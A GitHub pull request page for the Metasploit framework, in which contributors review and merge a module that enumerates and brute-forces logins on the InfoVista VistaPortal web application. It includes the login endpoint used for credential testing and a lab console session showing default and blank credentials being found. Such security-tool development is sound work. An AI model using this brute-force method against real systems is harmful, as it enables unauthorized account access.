Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

added infovista module #1962

Merged
merged 1 commit into from Jun 16, 2013
Merged

added infovista module #1962

merged 1 commit into from Jun 16, 2013

Conversation

juushya
Copy link
Contributor

@juushya juushya commented Jun 15, 2013

Added new aux module to enum & brute force InfoVista VistaPortal application.

@wvu
Copy link
Contributor

wvu commented Jun 15, 2013 

infovista_enum.rb:23 - [ERROR] Unicode detected: "\tINFOVISTA_FINGERPRINT = 'InfoVista\xC2\xAE VistaPortal\xC2\xAE'\n"

I don't know why msftidy doesn't like Unicode, but if I had to guess, it's because not everyone is using Unicode.

@wvu
Copy link
Contributor

wvu commented Jun 15, 2013

Is that string the best way to fingerprint the application?

@juushya
Copy link
Contributor Author

juushya commented Jun 15, 2013

@wvu-r7 That's the title string when application is first accessed, pre-authentication. Hence, I used it for fingerprinting. msftidy flags the unicode but the module runs good though.

jvazquez-r7
jvazquez-r7 reviewed Jun 16, 2013
View reviewed changes
modules/auxiliary/scanner/http/infovista_enum.rb
begin
res = send_request_cgi(
{
'uri' => '/VPortal/mgtconsole/CheckPassword.jsp',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@juushya has shared data via email for verification. While verification there is something which doesn't fit match the code. According to the data capture, the POST login authentication requests go against /VPortal/Connect.jsp, and not against /VPortal/mgtconsole/CheckPassword.jsp. @juushya could you confirm if it is fine?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@jvazquez-r7 It is fine. Normally, the auth req first actually goes to /VPortal/Connect.jsp which then forwards it to CheckPassword.jsp. I chose to test the login against the CheckPassword.jsp directly. If the login is valid, a 302 to AdminFrame.jsp is received, if not, then 302 to Login.jsp.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I see, we should need data capture which verifies this behavior.

@juushya
Copy link
Contributor Author

juushya commented Jun 16, 2013

@jvazquez-r7 emailed the capture to you. 👍

@jvazquez-r7
Copy link
Contributor

yeah! last capture looks good, proceeding with final testing cleanup and hopefully merging in a while :) thanks @juushya !!

jvazquez-r7 pushed a commit that referenced this pull request Jun 16, 2013
Land #1962, @juushya infovista brute force module
c243ed1
@jvazquez-r7 jvazquez-r7 merged commit ba59434 into rapid7:master Jun 16, 2013
@jvazquez-r7
Copy link
Contributor

Module working verified thanks to @juushya data captures. Thanks! Final cleanup to the module before merging can be found here: 3cd94f5

(fake environment) Test after cleanup:

msf > db_connect msf:@192.168.172.216:5432/msf
[*] Rebuilding the module cache in the background...
msf > workspace -a infovista
[*] Added workspace: infovista
msf > use auxiliary/scanner/http/infovista_enum 
msf auxiliary(infovista_enum) > reload
[*] Reloading module...
msf auxiliary(infovista_enum) > show options

Module options (auxiliary/scanner/http/infovista_enum):

   Name              Current Setting                        Required  Description
   ----              ---------------                        --------  -----------
   BLANK_PASSWORDS   true                                   no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                      yes       How fast to bruteforce, from 0 to 5
   PASSWORD                                                 no        A specific password to authenticate with
   PASS_FILE                                                no        File containing passwords, one per line
   Proxies                                                  no        Use a proxy chain
   RHOSTS                                                   yes       The target address range or CIDR identifier
   RPORT             443                                    yes       The target port
   STOP_ON_SUCCESS   false                                  yes       Stop guessing when a credential works for a host
   TARGETURI         /VPortal/mgtconsole/CheckPassword.jsp  yes       URI for Web login. Default: /VPortal/mgtconsole/CheckPassword.jsp
   THREADS           1                                      yes       The number of concurrent threads
   USERNAME                                                 no        A specific username to authenticate as
   USERPASS_FILE                                            no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true                                   no        Try the username as the password for all users
   USER_FILE                                                no        File containing usernames, one per line
   VERBOSE           true                                   yes       Whether to print output for all attempts
   VHOST                                                    no        HTTP server virtual host

msf auxiliary(infovista_enum) > set RPORT 80
RPORT => 80
msf auxiliary(infovista_enum) > set SSL false
SSL => false
msf auxiliary(infovista_enum) > set rhosts 192.168.172.192
rhosts => 192.168.172.192
msf auxiliary(infovista_enum) > run

[+] 192.168.172.192:80 - Application version is 4.2
[*] 192.168.172.192:80  - Trying username:"admin" with password:"admin"
[+] 192.168.172.192:80 - SUCCESSFUL LOGIN - "admin":"admin"
[*] 192.168.172.192:80 - Brute-forcing...
[*] 192.168.172.192:80  - [1/1] - Trying username:"" with password:""
[+] 192.168.172.192:80 - SUCCESSFUL LOGIN - "":""
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(infovista_enum) > hosts

Hosts
=====

address          mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------          ---  ----  -------  ---------  -----  -------  ----  --------
192.168.172.192             Unknown                    device         
msf auxiliary(infovista_enum) > creds

Credentials
===========

host             port  user   pass   type      active?
----             ----  ----   ----   ----      -------
192.168.172.192  80    admin  admin  password  true
192.168.172.192  80                  password  true

[*] Found 2 credentials.
msf auxiliary(infovista_enum) > services

Services
========

host             port  proto  name                   state  info
----             ----  -----  ----                   -----  ----
192.168.172.192  80    tcp    infovista vistaportal  open

@juushya juushya deleted the aux-infovista branch June 16, 2013 16:54
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@juushya @wvu @jvazquez-r7